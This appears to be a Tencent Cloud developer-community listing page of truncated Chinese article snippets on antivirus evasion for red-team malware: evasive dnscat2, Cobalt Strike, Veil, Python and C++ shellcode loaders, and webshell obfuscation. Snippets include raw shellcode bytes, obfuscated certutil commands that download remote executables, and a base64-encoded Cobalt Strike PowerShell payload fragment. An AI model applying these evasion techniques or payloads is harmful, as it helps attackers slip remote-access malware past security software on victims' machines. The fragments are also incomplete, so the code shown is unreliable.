- 综合排序
- 最热优先
- 最新优先
- 来自专栏鸿鹄实验室
免杀dnscat2
今天忙里偷闲,做了个免杀的dnscat2,dnscat2是啥?懂得都懂。 对dnscat2进行修改,使其具有bypassAV的功能。 未修改时: ? 修改后: ? 下载地址:https://github.com/lengjibo/RedTeamTools/tree/master/windows/dnscat2 我们都这么肝了,还不点个在看,点个转发?
61140发布于 2021-04-15 - 来自专栏鸿鹄实验室
免杀tips2
0xe4 ,0xf0 ,0xe8 ,0xcc ,0x00 ,0x00 ,0x00 ,0x41 ,0x51 ,0x41 , 0x50 ,0x52 ,0x51 ,0x56 ,0x48 ,0x31 ,0xd2 ,0x48 ,0x0f ,0xb7 ,0x4a ,0x4a ,0x4d ,0x31 ,0xc9 ,0x48 ,0x31 ,0xc0 ,0xac , 0x3c ,0x61 ,0x7c ,0x02 ,0x2c ,0x20 ,0x41 ,0xc1 ,0xc9 ,0x0d ,0x41 ,0x01 ,0xc1 ,0xe2 ,0xed ,0x52 ,0x41 ,0x51 , 0x48 ,0x8b ,0x52 ,0x20 ,0x05 ,0x41 ,0x5e ,0x50 ,0x50 ,0x4d ,0x31 ,0xc9 ,0x4d ,0x31 ,0xc0 ,0x48 ,0xff ,0xc0 ,0x48 ,0x89 ,0xc2 0xba ,0xea ,0x0f ,0xdf ,0xe0 ,0xff ,0xd5 ,0x48 ,0x89 ,0xc7 ,0x6a , 0x10 ,0x41 ,0x58 ,0x4c ,0x89 ,0xe2
58110发布于 2021-04-15 - 来自专栏nginx遇上redis
android service原理及免杀(2)
2.创建一个工作队列依次传递一个intent到你实现的onHandleIntent()方法,避免了多线程。
51210发布于 2019-12-05 - 来自专栏Gamma安全实验室
一款轻松免杀主流杀软的c2框架
前言 恕我直言,cs 无论是马或者源文件都被分析烂了,且 cs 的行为太明显了,必 须要大改特改才能满足现在的红蓝对抗,但是想大改谈何容易,所以最快的方 法是寻找一款新的 c2 框架,说白了,远控自己都能写一个出来 故事从现在开始 最佳有一款老外开发的猎鹰 c2 框架说是要在下周发布,看着很吊的样子,我们 拭目以待,今天要介绍的一款好玩的用 rust 语言开发的 c2 框架,是我无意间 逛 github 上面看到的 直接运行,然后我们进入框架里面,会让你先选择监听 c2 的端口 . 进入会话: links -i 97234593be5f4b2ca8fc7a4f4b8d775e 可以执行系统命令: ? 通过 help 查看当前支持的功能: ? 现在测试免杀效果,用原生的生成 exe 来测试,我觉得不错,因为 rust 这门语言真的太小众了 静态过了: ?
1.7K40发布于 2021-07-23 - 来自专栏红蓝对抗
免杀学习-从指令绕过开始(2)
certutil指令绕过 上次我们的免杀成功的绕过了联网360,但在半个月后就被无情的杀掉了,原因和火绒的报错一致是因为敏感指令certutil导致了报警,那么我们本次学习的主题就是如何绕过certutil www.baidu.com 还有一个是利用双引号绕过 那么我们根据其特性进行类似构造 ^c""^e^r^t""u^ti^l -u^r"l""""cache -gmt -split -f ht""tp://1"2"7.0.0.1
63020编辑于 2023-09-25 - 来自专栏红蓝对抗
免杀学习-从指令绕过开始(2)
certutil指令绕过上次我们的免杀成功的绕过了联网360,但在半个月后就被无情的杀掉了,原因和火绒的报错一致是因为敏感指令certutil导致了报警,那么我们本次学习的主题就是如何绕过certutil www.baidu.com还有一个是利用双引号绕过那么我们根据其特性进行类似构造^c""^e^r^t""u^ti^l -u^r"l""""cache -gmt -split -f ht""tp://1"2"7.0.0.1 132篇原创内容公众号收录于合集 ##免杀 4个上一篇免杀学习-从指令绕过开始-1
53720编辑于 2023-11-04 - 来自专栏白帽子安全笔记
解决之前2个项目不免杀的问题
#选项有:mailslot、peek、pipe、readfile、readfile-v2、template artifactkit_technique="mailslot" #分配内存选项有:HeapAlloc (kali安装一下apt install gedit方便右键打开文件进行编辑) 修改上述2处后,继续免杀,如果后续再被查杀的话,那么可尝试继续修改不同组合(6*3=18种)和版本信息即可。
29110编辑于 2024-10-28 - 来自专栏YX’blog
【免杀】certutil工具bypass杀软
查看文件hash Hash algorithms: MD2 MD4 MD5 SHA1 SHA256 SHA384 SHA512. certutil -hashfile 文件 hash类型 下载 Certutil.exe windows\system32\certutil.exe abc.txt abc.txt -urlcache -split -f http://192.168.102.1/1/yanxia.exe 法2, 工具给certutil修改资源(这里我随手拿了360的工具来换) 点击操作-从资源文件加载 按下图进行勾选 然后保存 就像下图 实战测试一下 最新火绒 最新360核晶(p1在虚拟机中测试的,p2物理机测试
1.3K10编辑于 2024-05-26 - 来自专栏乌鸦安全
PowerShell随机免杀结合ps2exe上线
本文作者:culin师傅 01 前 言 昨天在freebuf上看到了一篇文章,讲的是使用ps2exe将powershell.ps1文件,编译成为可执行的EXE文件.原文链接如下: https:/ 免杀 首先讲下如何对powershell.ps1进行免杀: 原先生成的powershell.ps1文件中的内容如下,很容易被杀软检测到. 但是有时候杀软记录了特征,如果一直固定分离成两个或者三个可能会失效。 经过Virustotal检测,已经过了很多杀软了: 03py2exe生成exe ps2exe项目地址如下 https://github.com/MScholtes/PS2EXE.git 存在图形化操作界面 ,我们直接使用即可,成功生成Flash.exe文件 最终成功生成一个EXE文件,经测试绕过了360,火绒等绝大多数杀软,并且可以正常加载。
1.2K30发布于 2021-11-16 - 来自专栏白安全组
老牌免杀工具veil免杀
Veil-Evasion 是一个用 python 写的免杀框架,可以将任意脚本或一段 shellcode 转换成Windows 可执行文件,还能利用Metasploit框架生成相兼容的 Payload 使用下面命令 dk ps -a //查看启动的镜像 dk exec -it 4ae72dc914c9 /bin/bash 执行 veil命令可启动,版本为 3.1.1 veil使用 veil 有两个免杀的工具 Ordnance 可生成在 Veil-Evasion 中使用的 shellcode,Evasion 是用做文件免杀 我们一般选择Evasion Veil>: use 1 #选择Evasion功能 Veil
70710编辑于 2025-01-13 - 来自专栏全栈程序员必看
〖免杀〗.net程序一键免杀Win10 20H2 Defender「建议收藏」
WIN10更新至最新版20H2发现,查杀能力比以前强了不少,特别是针对CS加载.NET程序集或NIM加载.NET的查杀,毕竟你要调用的函数微软很了解,它想拦截想杀还是比较容易的。 2.PNG)] 这种情况怎么解决? 免杀.net程序 net2nim Ladon.exe out.exe 使用Nim加载.net程序集也可以免杀不少杀软,在此版本之前也可过Defender,但Win10更新至20H2后虽然静态不杀,但一执行会被拦截 8.PNG)] 若发现哪些模块不可使用,可自行参考WIKI,将缺少的模块名称参数加入 转换完成后,我们再测一下20H2的Defender,免杀成功,可以嗨起来了。 参考 Ladon免杀/.NET免杀/Exe2Ps1/Ps12Exe http://k8gege.org/Ladon/Exe2Powershell.html Ladon九种PowerShell命令混淆加密免杀方法
2.4K10编辑于 2022-09-23 - 来自专栏全栈程序员必看
免杀工具下载_360免杀器
—-网易云热评 一、简介 快速生成免杀exe可执行文件,目前拥有三种免杀的方法 二、下载及安装 1、下载到本地 git clone https://github.com/lengjibo/FourEye.git 2、进入该文件夹 cd FourEye 3、安装需要的python库 pip install -r requirements.txt 三、使用方法 1、打开该软件 python3 BypassFramework.py 2、显示可生成的软件,list 3、选择shellcode,显示可选择的免杀方式 4、选择fibers免杀方式,加密方式选择xor,输入shellcode,选择平台的位数,execute运行
1.3K30编辑于 2022-09-24 - 来自专栏红蓝对抗
免杀|计算地址实现内存免杀
免杀是同所有的检测手段的对抗,目前免杀的思路比较多。本篇介绍了一个独特的思路,通过内存解密恶意代码执行,解决了内存中恶意代码特征的检测。 原文链接:https://forum.butian.net/share/2669 0x00 前言 免杀是同所有的检测手段的对抗,目前免杀的思路比较多。 0x02 流程 通过双重 xor 对shellcode进行加密 申请内存执行指定命令 通过计算地址执行解密函数指令后执行shellcode 效果: 0x03 免杀制作思路 1、静态免杀 杀软是通过标记特征进行木马查杀的 动态免杀 内存解密恶意代码 恶意代码检测的方式非常之多,如EDR常用的特征检测、HOOK常用API、检测父子进程关系等方式。 原理是在真正的shellcode执行之前通过call指令跳到我们想跳的地方去,比如到刚才的解密函数: unsigned char shellcode[] = "\xe8\x2b\x10\x06\x00.
1.5K10编辑于 2024-01-17 - 来自专栏正汰的学习笔记
【CS】Cobalt Strick的Malleable2 C2配置以及PowerShell免杀
Malleable2 C2配置 首先,我从一开始就踩了个坑,CS不应该是个开箱即用的东西吗,仔细一想,不对,那样的话流量特征不就明明白白了吗,这里需要用到Malleable C2 Profile。 如果不用这个混淆流量的话,CS造的PowerShell的马即使能免杀,在后续下发指令的时候也会被Windows Defender给杀掉。 在Listener里面我们也要使用https这种加密的流量,更好绕过防火墙 PowerShell免杀 首先,我们对生成的Payload进行一定研究,发现FromBase64String这个函数应该是被拉黑了 示例如下 #Base64 [Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbKsCMjI3lrquJim5giIyNuEupicmJySSBicmKZdKq85dz2yFp4a6riaxLxaqr7bhLqcUsjEeOncXFimch2DRjc9muq5Wug4HNJKXxrqtKZPCMjI0kjS6MQIyNqqsNimicjIyNimVZlvaXc9muq0muq ) { bps($1, &callback); } else{ bsleep($1, 5, 37); } } 效果如图 即实现免杀+
61210编辑于 2024-01-16 - 来自专栏Ms08067安全实验室
远控免杀专题(13)-zirikatu免杀(VT免杀率3971)
文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus ---- 免杀能力一览表 ? 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。 5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。 virustotal.com中39/71个报毒,以为能过360和火绒,免杀应该不错的... ?
2.2K20发布于 2020-04-01 - 来自专栏乌鸦安全
【免杀】C++静态免杀学习
别人的静态免杀 在Github上看到一个c++的免杀,在4月6号的时候,还是bypass 很多的,但是一个月过去了,我执行之后发现了只能过火绒: 项目地址:https://github.com/G73st 复现其他师傅的免杀 2.1 c++部分 其实他这部分代码的逻辑就是一个利用自己的密钥进行解密,解密之后再申请内存,执行shellcode,在这里先将别人的代码下载下来,在本地跑一下: 先把项目下载,然后把 免杀Windows Defender 对于作者一个月以前的更新,可以过Windows Defender,但是现在只能免杀火绒,在这里对此做一个小小的改动,就可以达到以前的那种效果,但是依旧无法过360( 因为免杀一直会被标记,此处的tips暂不提供,希望师傅能够理解) 此时最新版的Windows Defender 上线成功: 但是!!! 当然,在这个免杀中,均属于静态免杀,有些属于乱杀,就像碰到易语言一样,大家都杀!
2.7K30编辑于 2022-06-07 - 来自专栏HACK学习
免杀 | 利用Python免杀CS Shellcode
第二:如果你本机还安装了python3的环境,如果你怕麻烦,你可以单独在虚拟机里面安装这个环境,因为python3和python2共存,你还得倒腾一会儿,里面的坑还有 pip2 pip3得区分开等等。 总结:本文所阐述的粗略且浅显的免杀方法都是站在CobaltStrike强大的肩膀上实现的。 2、指定图标的编译方式 python2 PyInstaller.py --noconsole --icon cs\icon.ico --onefile cs\cs.py ? ? 一切正常,且杀软没有任何拦截与提示 2、查看进程列表 ? 3、屏幕截图 ? 当然,这都是些没用的,接下来,来点刺激的。 4、ms17010 ? ? ms17010打得也流畅。 0x09 总结 此种方式的缺点:单文件体积过大,go语言比较小,veil里面有使用go进行免杀的,单文件体积在800kb左右,如果你学过go的语法,建议你利用go语言来免杀,具体操作,你可以在使用veil
4.9K62发布于 2020-02-26 - 来自专栏网络安全攻防
免杀攻防之Webshell免杀研究
免杀实战—小马免杀 引用免杀 因为D盾、安全狗、护卫神会对关键字eval中的执行变量进行溯源,当追溯到要执行的变量为一个通过POST接收的可疑数据时就会显示可疑木马,为了躲避这种溯源方式,可以通过多次使用 幸好今天"反引号"大哥来串门,不妨让他来帮个忙: 发现成功免杀,之后我们再使用安全狗查杀一下看看————成功免杀 护卫神————成功免杀 至此,成功免杀安全狗、护卫神、D盾,之后我们试试可用性: ,例如: 至于设计原理上面的注释中想必已经说得很是详细了,这里就不再一一复述了,下面我们使用D盾进行查杀看看——免杀 之后使用安全狗查杀看看————成功免杀 之后使用护卫神查杀看看————成功免杀 至此 之后使用安全狗查杀————成功免杀 之后使用护卫神查杀————成功免杀 至此,成功免杀D盾、安全狗、护卫神,之后我们使用菜刀连接试试看是否可以正常使用: 免杀实战—大马免杀 加密&混淆 在免杀处理的众多方法中 之后使用安全狗查杀————成功免杀 之后使用护卫神查杀————成功免杀 至此,成功免杀D盾、安全狗、护卫神,之后我们试试可用性: 文末小结 这篇免杀文章最初写作与2019年10月份左右,文中涉及到的免杀技巧大多数是较为成熟的技巧
2.2K10编辑于 2024-06-08 - 来自专栏红蓝对抗
免杀&&抽奖|python进行shellcode免杀
本文分为几个部分: 1、shellcode加载器实现; 2、代码混淆; 3、寻找免杀api 4、分离免杀,分离加载器与shellcode; 5、python打包成exe 6、组合,免杀效果分析 0x01 但是现在并没有任何免杀效果。 ,即可过大部分杀软。 反序列化 + pyinstaller+python3 : 0x07 小节 免杀的方式多种多样,这只是免杀技术的冰山一角角。 我们可以看出,虽然最后的查杀率还可以,但是生成的文件太大了,也有一些杀软把用py2exe、pyinstaller生成的任何exe包都当作了恶意文件,因此在实际中,还是更推荐用C#、go这种语言来写免杀。
4K30编辑于 2022-08-30 - 来自专栏Ms08067安全实验室
远控免杀专题(5)-Veil免杀(VT免杀率2371)
本专题文章导航 1、远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2、远控免杀专题(2)-msfvenom隐藏的参数:https ://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w 3、远控免杀专题(3)-msf自带免杀(VT免杀率35/69):https://mp.weixin.qq.com 5、远控免杀专题(5)-Veil免杀(VT免杀率23/71):本文 文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus ---- 免杀能力一览表 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 比较遗憾的是生成的exe文件比较大,go语言生成的exe大约2M,python生成的exe大约4M,ruby生成的exe大约700K,相比msf原生态的exe大打多了。
2.4K20发布于 2020-03-04
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号